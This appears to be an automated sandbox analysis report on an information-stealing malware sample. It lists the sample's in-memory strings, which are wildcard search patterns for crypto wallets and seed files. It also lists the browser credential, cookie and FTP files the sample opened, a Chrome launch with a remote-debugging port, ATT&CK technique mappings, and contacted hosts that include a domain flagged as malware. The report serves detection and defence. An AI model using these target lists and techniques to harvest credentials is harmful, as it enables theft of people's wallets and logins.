            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: pData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|All_Disk|%DRIVE_FIXED%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|4|*Windows*,*Program Files*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash_Card|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|4|*Windows*,*Program Files*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: pData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|All_Disk|%DRIVE_FIXED%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|4|*Windows*,*Program Files*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash_Card|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|4|*Windows*,*Program Files*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
            Source: Participating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: multidoge.wallet
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: Participating.com, 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\db\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\security_state\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\to-be-removed\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\crashes\events\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\events\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\pending_pings\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\bookmarkbackups\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\2023-10\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\saved-telemetry-pings\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\archived\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\datareporting\glean\tmp\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\minidumps\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\sessionstore-backups\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\storage\permanent\key4.db
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Exodus\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\MultiDoge\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Binance\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
            Source: Participating.comBinary or memory string: WIN_81
            Source: Participating.comBinary or memory string: WIN_XP
            Source: Computing.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: Participating.comBinary or memory string: WIN_XPe
            Source: Participating.comBinary or memory string: WIN_VISTA
            Source: Participating.comBinary or memory string: WIN_7
            Source: Participating.comBinary or memory string: WIN_8
            Source: Yara matchFile source: 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2640138284.000000000021A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Participating.com PID: 8084, type: MEMORYSTR

            Remote Access Functionality

            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: Process Memory Space: Participating.com PID: 8084, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D62263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00D62263
            Source: C:\Users\user\AppData\Local\Temp\615578\Participating.comCode function: 11_2_00D61C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,11_2_00D61C61
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            2
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            2
            Valid Accounts
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol4
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter
            1
            Registry Run Keys / Startup Folder
            1
            Extra Window Memory Injection
            2
            Obfuscated Files or Information
            Security Account Manager3
            File and Directory Discovery
            SMB/Windows Admin Shares21
            Input Capture
            1
            Remote Access Software
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            1
            DLL Side-Loading
            NTDS26
            System Information Discovery
            Distributed Component Object Model3
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            Extra Window Memory Injection
            LSA Secrets1
            Query Registry
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
            Process Injection
            121
            Masquerading
            Cached Domain Credentials221
            Security Software Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
            Registry Run Keys / Startup Folder
            2
            Valid Accounts
            DCSync1
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Virtualization/Sandbox Evasion
            Proc Filesystem4
            Process Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
            Access Token Manipulation
            /etc/passwd and /etc/shadow1
            Application Window Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
            Process Injection
            Network Sniffing1
            System Owner/User Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            [Behavior graph: ID 1576056, sample nB52P46OJD.exe, start date 16/12/2024, architecture WINDOWS, score 100]

            Source | Detection | Scanner | Label | Link
            nB52P46OJD.exe | 18% | ReversingLabs | |

            Source | Detection | Scanner | Label | Link
            C:\ProgramData\479RQ1NOHDJM\RIMOH4 | 0% | ReversingLabs | |
            C:\Users\user\AppData\Local\Temp\615578\Participating.com | 0% | ReversingLabs | |

            No Antivirus matches
            No Antivirus matches

            Source | Detection | Scanner | Label | Link
            https://sedone.onlineIW4WT2ontent-Disposition: | 0% | Avira URL Cloud | safe |
            https://sedone.online | 100% | Avira URL Cloud | malware |
            https://sedone.onlineOHDJMContent-Disposition: | 0% | Avira URL Cloud | safe |
            https://sedone.online6FCB | 0% | Avira URL Cloud | safe |
            https://sedone.online58eafcad35nt-Disposition: | 0% | Avira URL Cloud | safe |
            https://sedone.online/2) | 100% | Avira URL Cloud | malware |

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            chrome.cloudflare-dns.com | 172.64.41.3 | true | false | | high
            t.me | 149.154.167.99 | true | false | | high
            ssl.bingadsedgeextension-prod-europe.azurewebsites.net | 94.245.104.56 | true | false | | high
            sb.scorecardresearch.com | 18.165.220.57 | true | false | | high
            www.google.com | 142.250.181.68 | true | false | | high
            sedone.online | 116.203.12.114 | true | false | | high
            s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
            googlehosted.l.googleusercontent.com | 172.217.19.225 | true | false | | high
            clients2.googleusercontent.com | unknown | unknown | false | | high
            bzib.nelreports.net | unknown | unknown | false | | high
            assets.msn.com | unknown | unknown | false | | high
            IuwKjpytGYqQ.IuwKjpytGYqQ | unknown | unknown | false | | unknown
            ntp.msn.com | unknown | unknown | false | | high

            Name | Malicious | Antivirus Detection | Reputation
            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734353246080&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true | false | | high
            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734353252776&w=0&anoncknm=app_anon&NoResponseBody=true | false | | high
            https://assets.msn.com/statics/icons/favicon_newtabpage.png | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                                https://sedone.online6FCBParticipating.com, 0000000B.00000002.2640138284.00000000002E9000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                http://anglebug.com/7556chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://steamcommunity.com/profiles/76561199807592927d0wntgMozilla/5.0Participating.com, 0000000B.00000002.2646862298.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://chromewebstore.google.com/msedge.exe, 00000015.00000002.2197308191.000047B80017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.23.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgParticipating.com, 0000000B.00000002.2649991672.0000000005050000.00000004.00000800.00020000.00000000.sdmp, Participating.com, 0000000B.00000002.2647629721.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp, PH4O89.11.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://drive-preprod.corp.google.com/chrome.exe, 00000011.00000003.2004401755.00006C78004A4000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://srtb.msn.cn/2cc80dabc69f58b6_1.23.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://msn.comXIDv10Cookies.24.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://chrome.google.com/webstore/manifest.json.23.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.23.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000011.00000003.2046718590.00006C780240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://sedone.onlineParticipating.com, 0000000B.00000002.2640138284.000000000018A000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://browser.events.data.msn.com/2cc80dabc69f58b6_1.23.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://sedone.online/2)Participating.com, 0000000B.00000002.2646862298.0000000004B6F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000015.00000003.2153758878.000047B800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153952278.000047B80026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2153695423.000047B800264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://anglebug.com/6692chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2154431879.000047B8002F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://issuetracker.google.com/258207403chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://anglebug.com/3502chrome.exe, 00000011.00000003.2008012258.00006C7800D50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://anglebug.com/3623chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.office.com3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  http://anglebug.com/3625chrome.exe, 00000011.00000003.2007922700.00006C7800390000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://outlook.live.com/mail/0/3116c8ac-d362-41fe-909b-e97844d01725.tmp.23.drfalse
                                                                                                                                                                                                                      high
